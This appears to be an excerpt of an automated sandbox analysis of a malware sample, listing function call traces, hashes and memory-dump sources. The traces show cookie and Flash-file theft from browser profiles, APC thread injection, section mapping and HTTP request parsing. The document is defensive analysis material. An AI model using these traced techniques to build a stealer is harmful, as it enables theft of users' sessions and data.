  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C13D6, Relevance: 4.5, APIs: 3, Instructions: 18 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
